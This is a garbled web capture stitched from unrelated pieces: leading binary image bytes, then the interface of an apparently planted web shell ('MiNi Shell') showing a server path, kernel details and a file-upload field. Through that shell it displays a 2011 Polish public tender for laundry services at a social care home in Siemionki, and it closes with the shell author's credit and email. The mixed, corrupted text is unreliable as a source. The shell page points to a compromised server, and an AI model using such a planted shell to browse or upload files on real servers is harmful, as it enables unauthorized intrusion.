JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110105/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110105/6671-N-2011.html

<p class="kh_header"><b>Jeziora Wielkie: Usługi pralnicze dla DPS w Siemionkach</b><br>
<b>Numer ogłoszenia: 6671 - 2011; data zamieszczenia: 05.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Siemionkach , Siemionki 13, 88-324 Jeziora Wielkie, woj. kujawsko-pomorskie, tel. 052 3187623, faks 052 3187623.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpssiemionki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi pralnicze dla DPS w Siemionkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia publicznego, o wartości poniżej kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (j.t.: Dz. U. z 2010r. Nr 113, poz. 759 z późn. zm.).

3.1	Przedmiotem zamówienia jest sukcesywne wykonywanie przez okres trwania umowy usług pralniczych w zakresie prania wodnego dla Domu Pomocy Społecznej w Siemionkach. 
3.1.1	Usługi pralnicze będące przedmiotem zamówienia obejmują :
a)	pranie wodne odzieży, ręczników, pościeli, koców, poduszek, kołder, materacy, podkładów Mieszkanek DPS i innych rzeczy przekazanych do prania przez Zamawiającego, w tym fartuchów kuchennych i odzieży roboczej pracowników Zamawiającego.
b)	maglowanie, prasowanie,
c)	drobne naprawy krawieckie (w szczególności wszycie brakujących guzików, zszycie naderwanych materiałów, inne).
3.1.2	Szacunkowy asortyment rzeczy przekazywanych do prania w przewidywanym okresie obowiązywania umowy przedstawiony został w załączniku nr 5- asortymencie do prania. Zamawiający nie dokonuje podziału rzeczy na białe i kolorowe.
3.1.3	Szacunkowa ilość rzeczy przekazanych do prania w okresie obowiązywania umowy wynosi:
a)	Wszystkich rzeczy:  :     42 000 kg (bez podziału na rzeczy białe i  kolorowe, do maglowania i bez maglowania itp.).
b)	Rzeczy przeznaczonych do prania wodnego wraz z maglowaniem : 18260 sztuk. Maglowaniu podlega pościel.
3.1.4	Ilości oraz asortyment rzeczy przekazywanych do prania są szacunkowe, zbliżone do planowanego zapotrzebowania Zamawiającego i w trakcie realizacji umowy mogą ulec zmianie.  Służyć one będą wyłącznie do porównania ofert oraz wybrania oferty najkorzystniejszej.
3.1.5	Szczegółowa ilość i asortyment rzeczy przekazanych do prania jak i dostarczonych przez Wykonawcę wynikać będzie z dokumentów potwierdzających przyjęcie i odbiór rzeczy,  w tym z protokołu przekazania-odbioru. 
3.2	Za prawidłowe wykonanie usługi ustala sie, odebranie od Wykonawcy rzeczy prawidłowo wypranych zgodnie z wymaganym terminem i innymi warunkami niniejszej SIWZ.
3.3	Za prawidłowo wyprane uważa się rzeczy, które są:
a)	czyste pozbawionych przebarwień, bez plam pierwotnych i plam wtórnych, powstałych po wadliwym procesie prania wodnego; 
b)	suche;
c)	o charakterystycznym świeżym, przyjemnym zapachu środka do czyszczenia;
d)	wyprane z zastosowaniem środków dopuszczonych przez Państwowy Zakład
Higieny lub równoważny, wymienione środki nie mogą wywoływać podrażnień skóry i odczynów alergicznych;
e)	z zachowaniem naturalnej barwy i struktury materiału;
f)	wykrochmalone (dotyczy pościeli) i odpowiednio wymaglowane;
g)	wyprasowane, naprawione;
h)	złożone i pogrupowane według rodzaju;
i)	dostarczone do Zamawiającego zgodnie z warunkami określonymi w SIWZ i umowie.
3.4	Nazwa i kod przedmiotu zamówienia wg Rozporządzenia Komisji (WE) w sprawie Wspólnego Słownika Zamówień (CPV): 
a)	98310000-9 Usługi prania i czyszczenia na sucho
b)	98.31.50.00-4. Usługi prasowania
c)	98393000-4 Usługi krawieckie
3.5	Usługi pralnicze mają być wykonane zgodnie z obowiązującą w tym zakresie technologią określoną Polskimi Normami, a wszystkie używane (planowane do użycia) do prania środki powinny posiadać aktualną opinie (atest, zaświadczenie) np. Państwowego Zakładu Higieny (PZH) lub deklaracje, certyfikaty zgodności stosownie z ustawą z dnia 30 sierpnia 2002 r. o systemie oceny zgodności (j.t. Dz. U z 2002r., Nr 138, poz. 935 z późn.zm.). Usługi pralnicze będą realizowane zgodnie z wymaganiami sanitarnymi.
3.6	W przypadku stosowania do wykonania usługi substancji niebezpiecznych, w myśl ustawy z dnia 11 stycznia 2001 r. o substancjach i preparatach chemicznych (j.t. Dz. U. z 2009 r. Nr 152, poz. 1222 z pózn. zm), należy stosować środki dopuszczone do obrotu decyzją Inspektora do spraw Substancji i Preparatów Chemicznych (ocena ryzyka dla zdrowia lub środowiska stwarzana przez daną substancję).
3.7	Zamawiający nie dopuszcza stosowania w procesie prania i dezynfekcji środków zawierających związki chlorowe i fosforany.
3.8	 Wykonawca jest zobowiązany do zachowania higieny transportu rzeczy, tzn. odizolowania ich od powierzchni ładunkowych środka transportowego.
3.9	Wykonawca ponosi odpowiedzialność za uszkodzenia, utratę lub zaginiecie przejętych rzeczy i zobowiązuje się do pokrycia wartości szkody poniesionej przez Zamawiającego po uprzednim szacunkowym określeniu ceny i stopnia zużycia uszkodzonej rzeczy. 
3.10	W przypadku zakwestionowania przez Zamawiającego jakości wykonanej usługi, Wykonawca zobowiązany jest do poprawy wykonanej usługi w terminie 24 godzin, licząc od momentu powiadomienia.
3.11	Odbiór i dostarczenie rzeczy przeznaczonych do prania z i do magazynu Zamawiającego w Siemionkach 13, Gm. Jeziora Wielkie odbędzie się transportem Wykonawcy i na jego koszt oraz ryzyko;
3.12	Transport rzeczy musi być świadczony wyłącznie środkami transportowymi przystosowanymi do tego rodzaju usług.
3.13	Wykonawca zobowiązany jest każdorazowo na wniosek Zamawiającego udostępnić książkę dezynfekcji transportu, w którym przewożone są rzeczy przeznaczone do prania lub wyprane;
3.14	Zamawiający, w wyjątkowych sytuacjach, zastrzega sobie prawo do zlecenia wykonania usługi prania bielizny lub innych rzeczy w ciągu 24 godzin, po uprzednim uzgodnieniu telefonicznym;
3.15	Wykonawca przed wywiezieniem z pralni wypranych rzeczy zobowiązany będzie zapakować je w foliowe opakowania lub inne odpowiednio zabezpieczające rzeczy przed zabrudzeniem, zniszczeniem, itp. Opakowanie z rzeczami wypranymi będzie wyraźnie oznakowane jako rzeczy Zamawiającego wraz z podaniem adresu;
3.16	Niedopuszczalne jest mieszanie, a w tym pranie rzeczy Zamawiającego z rzeczami innych użytkowników pralni.
3.17	Wykonawca zobowiązany jest świadczyć usługi systematycznie dwa razy w tygodniu, we wtorki i piątki, w przypadku, gdy termin świadczenia usługi wypadnie w dzień ustawowo wolny od pracy, to w innym dniu ustalonym przez Zamawiającego. W przypadku pobrania z magazynu Zamawiającego rzeczy do prania we wtorek, Wykonawca dostarczy je wyprane w piątek, natomiast pobrane w piątek dostarczy wyprane we wtorek. Zamawiający w wyjątkowych sytuacjach dopuszcza możliwość wydłużenia terminu wykonania usługi, termin ten jednak musi być uzgodniony z Zamawiającym;
3.18	Dostawa rzeczy po praniu musi nastąpić w wyznaczony dzień, w godzinach               od 7:00 - 14:30;
3.19	Wykonawca zobowiązany jest dostarczyć do magazynu Zamawiającego wszystkie wyprane rzeczy przed pobraniem następnej partii prania;
3.20	Rzeczy do prania skażone pakowane będą przez Zamawiającego w worki na odzież zakaźna;
3.21	Rzeczy do prania będą do transportu przygotowane i oznakowanie przez Zamawiającego w opakowaniach zapewnionych przez Wykonawcę.
3.22	Zamawiający zobowiązuje się przekazywać Wykonawcy do prania, rzeczy w stanie umożliwiającym ich pranie, bez uzasadnionych wątpliwości co do ich uszkodzenia w trakcie realizacji usług pralniczych. W przypadku wystąpienia takich wątpliwości w rzeczach przekazanych do prania Wykonawca poinformuje o tym Zamawiającego przed przystąpieniem do prania tych rzeczy.
3.23	Zamawiający zapewni w swojej siedzibie możliwość odbioru rzeczy do prania oraz przekazania rzeczy wypranych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od wykonawców wniesienia  wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku Zamawiający żąda oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 PZP, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku Zamawiający żąda oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 PZP, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku Zamawiający żąda oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 PZP, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku Zamawiający żąda oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 PZP, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku Zamawiający żąda oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 PZP, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>24.2	 Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadkach wskazanych w SIWZ, w tym istotnych postanowieniach, które zostaną wprowadzone do umowy lub w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
24.2.1	Zmiana terminu realizacji  lub przedmiotu umowy:
24.2.1.1	Zmiany spowodowane zdarzeniami o charakterze siły wyższej niezależnie od stron umowy. Strony zobowiązują się do ustalenia odpowiednio zmienionego terminu lub przedmiotu umowy. Za siłę wyższą uważa się zdarzenie zewnętrzne, którego zaistnienia nie da się przewidzieć. W szczególności siłą wyższą będzie zgon Wykonawcy, a także niekorzystne warunki atmosferyczne, geologiczne, archeologiczne, a w tym klęski żywiołowe w rozumieniu ustawy z dnia 18 kwietnia 2002r. (Dz. U. z dnia 22 maja 2002r. Nr 62, poz. 558) czy działanie sił przyrody, jak huragan, powódź, zamieć. 
24.2.1.2	zmiany będące następstwem działania organów administracji.
24.2.1.3	konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.
24.2.1.4	Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego,                      a w szczególności:
a)	Pomniejszenie albo zwiększenie zapotrzebowania lub zmianę asortymentu lub wielkość usługi będącej przedmiotem umowy z uwagi na zmianę liczby Mieszkanek DPS w Siemionkach lub inne nieprzewidywalne czynniki mające istotne znaczenie na wielkość lub asortyment zamawianych mięs lub wędlin.
b)	Zmiana asortymentu rzeczy przekazywanych do prania z uwagi na potrzeby Mieszkanek DPS Siemionkach.
c)	Zmiany w zakresie terminów lub miejsca odbierania lub dostarczania rzeczy do prania. Zmiany będące następstwem działania organów administracji lub następstwem zmian organizacyjnych na terenie siedziby Zamawiającego.
24.2.2	Zmiany osobowe:
24.2.2.1	Zmiana osób, przy pomocy, których Wykonawca realizuje przedmiot umowy na inne legitymujące się, niezbędnymi uprawnieniami;
24.2.3	Pozostałe zmiany: 
24.2.3.1	Zmiana podwykonawcy -zmiana podmiotu, który uczestniczy w realizacji części zamówienia jako podwykonawca, na którego potencjale opierał się Wykonawca składając ofertę, będzie możliwa, pod warunkiem, że nowy podmiot wykaże spełnienie warunków udziału w postępowaniu, które wymagane były przez Zamawiającego w ogłoszeniu i SIWZ;
24.2.3.2	Rozszerzenie lub zawężenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy, o ile posłużenie się podwykonawcą doprowadzi do podniesienia jakości wykonania przedmiotu umowy, zmniejszenia należnego Wykonawcy wynagrodzenia lub zastosowania przy wykonaniu przedmiotu umowy bardziej zaawansowanych rozwiązań technologicznych ;
24.2.3.3	Zmiana w zakresie Wykonania zamówienia siłami własnymi;
24.2.3.4	Zmiana obowiązującej stawki VAT. Jeśli zmiana stawki VAT będzie powodować zwiększenie lub zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość odpowiednio zwiększenia lub zmniejszenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez wykonawcę;
24.2.3.5	 Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy.               W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia. 
24.2.3.6	Zmiany uzasadnione okolicznościami, o których mowa w art. 3571 ustawy                          z dnia 23 kwietnia 1964e. Kodeks Cywilny (Dz. U. z 1964r., Nr16 ,poz.93 z późn. zm.). 
24.2.3.7	Zmiana przedmiotu umowy lub terminu jej obowiązywania lub inna spowodowana  zmianą powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację zamówienia;
24.2.3.8	Inne zmiany spowodowane przez czynniki, których w momencie podpisywania umowy nie można było przewidzieć. 
24.2.3.9	 Inne zmiany, których warunki zostały określone w istotnych postanowieniach , które zostaną wprowadzone do umowy
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Powyższe zmiany do umowy winny być wprowadzone poprzez zmianę do umowy - aneks. Nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody
24.3	W szczególności nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
24.3.1	Skorzystanie z klauzul waloryzacyjnych jeżeli zostały przewidziane w umowie i na warunkach w niej określonych;
24.3.2	Zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego, zmiana dokumentów potwierdzających uregulowanie płatności wobec podwykonawców);
24.3.3	Zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami;
24.3.4	Udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych.
24.4	 Zmiany w umowie następują w formie pisemnej oraz za zgodą stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpssiemionki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Siemionkach; 
Siemionki 13, 
88-324 Jeziora Wielkie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.01.2011 godzina 12:00, miejsce: Dom Pomocy Społecznej w Siemionkach; 
Siemionki 13, 
88-324 Jeziora Wielkie
sekretariat na piętrze Pawilonu nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com